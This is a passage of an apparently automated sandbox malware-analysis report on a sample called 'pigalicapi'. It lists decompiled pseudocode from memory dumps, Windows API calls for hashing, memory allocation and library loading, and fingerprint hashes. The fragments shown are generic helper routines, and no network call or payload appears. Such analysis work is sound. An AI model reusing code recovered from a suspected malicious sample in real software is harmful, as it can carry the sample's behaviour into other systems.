                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                          						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                                          						E04007D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                                          						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                                          						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                                          						_v91 = 0;
                                                                                                                                                                                                                                                                                          						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                                          						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x04009409
                                                                                                                                                                                                                                                                                          0x04009414
                                                                                                                                                                                                                                                                                          0x0400943d
                                                                                                                                                                                                                                                                                          0x04009442
                                                                                                                                                                                                                                                                                          0x04009451
                                                                                                                                                                                                                                                                                          0x04009454
                                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                                          0x04009480
                                                                                                                                                                                                                                                                                          0x0400949a
                                                                                                                                                                                                                                                                                          0x0400949f
                                                                                                                                                                                                                                                                                          0x040094a2
                                                                                                                                                                                                                                                                                          0x040094a9
                                                                                                                                                                                                                                                                                          0x040094bf
                                                                                                                                                                                                                                                                                          0x040094ab
                                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                                          0x040094d1
                                                                                                                                                                                                                                                                                          0x040094ed
                                                                                                                                                                                                                                                                                          0x040094fd
                                                                                                                                                                                                                                                                                          0x04009502
                                                                                                                                                                                                                                                                                          0x04009513
                                                                                                                                                                                                                                                                                          0x04009519
                                                                                                                                                                                                                                                                                          0x04009521
                                                                                                                                                                                                                                                                                          0x04009533
                                                                                                                                                                                                                                                                                          0x0400953c
                                                                                                                                                                                                                                                                                          0x04009545
                                                                                                                                                                                                                                                                                          0x04009460
                                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                                          0x04009553

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                                          • Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 02B521F9
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 02B5223B
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 02B5228B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 100728148-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 35b556f18de54d6e509953a89c848922c00f68d86527bf6e65eb02786747f107
                                                                                                                                                                                                                                                                                          • Instruction ID: ec7eab9a30dd742e4baa14d4b2b2eec474931589f839107256b369933240368f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b556f18de54d6e509953a89c848922c00f68d86527bf6e65eb02786747f107
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF01F674A01208EFDB00CF94C945BAEBBB1EF48314F2482D8E909AB340C734EA50CFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040097C0(void* _a4) {
                                                                                                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                                                                                                          				char _t6;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_t6 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                                                                                                                                                          					return _t6;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t3;
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x040097c7
                                                                                                                                                                                                                                                                                          0x040097d6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040097d6
                                                                                                                                                                                                                                                                                          0x040097dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040097D6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a6464bf9f777ffb9bb0c8bcc6ffd973ce71ca1ca90abca8fff71af8c88fd8392
                                                                                                                                                                                                                                                                                          • Instruction ID: 2832c38799f6bf1d51ab83c3035fa25f48ec3c6083bfe65adac79a8cd9b78ebe
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6464bf9f777ffb9bb0c8bcc6ffd973ce71ca1ca90abca8fff71af8c88fd8392
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBC01271004208ABEB449F94D40CBA537ACEB04305F048111B60C95490C7789CC0C751
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040097A0(long _a4) {
                                                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                                                                                          0x040097b0
                                                                                                                                                                                                                                                                                          0x040097b7

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                                          • Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 970f856ceb6774d6d55eafb80a8567d1f43e5d322a02fda43bc548f14acea223
                                                                                                                                                                                                                                                                                          • Instruction ID: a475ccf704ffb9bb44a5ab9dad4d632a8792405e2d5779c6f696b187b5087f34
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970f856ceb6774d6d55eafb80a8567d1f43e5d322a02fda43bc548f14acea223
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6041C974A10119AFDB04CF48C494BAAB7B2FF88314F24C599EC195F395D775EA82CB80
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E0081D312(signed int _a4, signed int _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                                                                                                                          				long _t12;
                                                                                                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                                                                                                          				signed int _t17;
                                                                                                                                                                                                                                                                                          				long _t19;
                                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t17 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t17 == 0) {
                                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                                          					_t24 = _t17 * _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t24;
                                                                                                                                                                                                                                                                                          					if(_t24 == 0) {
                                                                                                                                                                                                                                                                                          						_t24 = _t24 + 1;
                                                                                                                                                                                                                                                                                          						__eflags = _t24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					_t10 = RtlAllocateHeap( *0x881004, 8, _t24); // executed
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					if(0 == 0) {
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return _t10;
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					__eflags =  *0x88166c;
                                                                                                                                                                                                                                                                                          					if( *0x88166c == 0) {
                                                                                                                                                                                                                                                                                          						_t19 = _a12;
                                                                                                                                                                                                                                                                                          						__eflags = _t19;
                                                                                                                                                                                                                                                                                          						if(_t19 != 0) {
                                                                                                                                                                                                                                                                                          							 *_t19 = 0xc;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t11 = E00818912(_t10, _t24);
                                                                                                                                                                                                                                                                                          						__eflags = _t11;
                                                                                                                                                                                                                                                                                          						if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          							L5:
                                                                                                                                                                                                                                                                                          							_t10 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = _t24 - 0xffffffe0;
                                                                                                                                                                                                                                                                                          							if(_t24 > 0xffffffe0) {
                                                                                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t12 = _a12;
                                                                                                                                                                                                                                                                                          							__eflags = _t12;
                                                                                                                                                                                                                                                                                          							if(_t12 != 0) {
                                                                                                                                                                                                                                                                                          								 *_t12 = 0xc;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t10 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                                                          					_t27 = _t13 / _t17 - _a8;
                                                                                                                                                                                                                                                                                          					if(_t13 / _t17 >= _a8) {
                                                                                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00817A0D(_t27))) = 0xc;
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L15:
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x0081d317
                                                                                                                                                                                                                                                                                          0x0081d31c
                                                                                                                                                                                                                                                                                          0x0081d339
                                                                                                                                                                                                                                                                                          0x0081d33e
                                                                                                                                                                                                                                                                                          0x0081d340
                                                                                                                                                                                                                                                                                          0x0081d342
                                                                                                                                                                                                                                                                                          0x0081d344
                                                                                                                                                                                                                                                                                          0x0081d344
                                                                                                                                                                                                                                                                                          0x0081d344
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081d34c
                                                                                                                                                                                                                                                                                          0x0081d355
                                                                                                                                                                                                                                                                                          0x0081d35b
                                                                                                                                                                                                                                                                                          0x0081d35d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081d391
                                                                                                                                                                                                                                                                                          0x0081d393
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081d35f
                                                                                                                                                                                                                                                                                          0x0081d35f
                                                                                                                                                                                                                                                                                          0x0081d366
                                                                                                                                                                                                                                                                                          0x0081d384
                                                                                                                                                                                                                                                                                          0x0081d387
                                                                                                                                                                                                                                                                                          0x0081d389
                                                                                                                                                                                                                                                                                          0x0081d38b
                                                                                                                                                                                                                                                                                          0x0081d38b
                                                                                                                                                                                                                                                                                          0x0081d368
                                                                                                                                                                                                                                                                                          0x0081d369
                                                                                                                                                                                                                                                                                          0x0081d36f
                                                                                                                                                                                                                                                                                          0x0081d371
                                                                                                                                                                                                                                                                                          0x0081d345
                                                                                                                                                                                                                                                                                          0x0081d345
                                                                                                                                                                                                                                                                                          0x0081d347
                                                                                                                                                                                                                                                                                          0x0081d34a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081d373
                                                                                                                                                                                                                                                                                          0x0081d373
                                                                                                                                                                                                                                                                                          0x0081d376
                                                                                                                                                                                                                                                                                          0x0081d378
                                                                                                                                                                                                                                                                                          0x0081d37a
                                                                                                                                                                                                                                                                                          0x0081d37a
                                                                                                                                                                                                                                                                                          0x0081d380
                                                                                                                                                                                                                                                                                          0x0081d380
                                                                                                                                                                                                                                                                                          0x0081d371
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081d31e
                                                                                                                                                                                                                                                                                          0x0081d322
                                                                                                                                                                                                                                                                                          0x0081d325
                                                                                                                                                                                                                                                                                          0x0081d328
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081d32a
                                                                                                                                                                                                                                                                                          0x0081d32f
                                                                                                                                                                                                                                                                                          0x0081d338
                                                                                                                                                                                                                                                                                          0x0081d338
                                                                                                                                                                                                                                                                                          0x0081d328
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008191AA,?,?,00000000,00000000,00000000,?,0081751F,00000001,00000214,?,?), ref: 0081D355
                                                                                                                                                                                                                                                                                            • Part of subcall function 00817A0D: __getptd_noexit.LIBCMT ref: 00817A0D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 328603210-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e1fbe10c25a9faa3b1372e7f37e9c3de72c2f999f3793fa6bd2b5cc865c1f600
                                                                                                                                                                                                                                                                                          • Instruction ID: c6711df54e880d6e140ac53fbb8ae1b26c11d749d05de5b3ac1dc32ff3110b45
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1fbe10c25a9faa3b1372e7f37e9c3de72c2f999f3793fa6bd2b5cc865c1f600
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 440175322013159AEB299F29DC04BEA375CFF81760F04861DE865DB290EB3498808752
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 32058807013959bc75ca9eb29078aa9c7ffb39fbeb41f5a80dfb52158778d1e3
                                                                                                                                                                                                                                                                                          • Instruction ID: 494311dc5f11c2ed5546a9b413aae3ae819c9a7d152234ae656286f103779493
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32058807013959bc75ca9eb29078aa9c7ffb39fbeb41f5a80dfb52158778d1e3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D09E74D1521CFBCB20DAA8D94475DB7F8DB09291F1045D8ED0D9B200E635AA509694
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000,0081CC32,00881040,00000314,00000000,?,?,?,?,?,00818858,00881040,Microsoft Visual C++ Runtime Library,00012010), ref: 008173BF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 44ace95ad34701e3985361f28ca6fd392dd25a10f66d2e0a26c0cc9338523da1
                                                                                                                                                                                                                                                                                          • Instruction ID: 1f06bf96eb2fcb5b6f04f6da5ee71aa24f81936f18059d333985ec77e2a39efe
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ace95ad34701e3985361f28ca6fd392dd25a10f66d2e0a26c0cc9338523da1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,02B51A51,00003000,00000004,000000BE,?,02B51A51,?), ref: 02B51A01
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ef1dc2246bb9c78b26690423c7532f411c559424b9268388900a5387131f747c
                                                                                                                                                                                                                                                                                          • Instruction ID: a3ab8f44e21ba05b55e511f217f891a8a1c53c278b3c2be7199f643884c8ed52
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1dc2246bb9c78b26690423c7532f411c559424b9268388900a5387131f747c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFD0C9B4A85308BBE710CA84DC06F69BBACDB04651F004185FE089B380D5B1AE1056A1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 02B5182F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
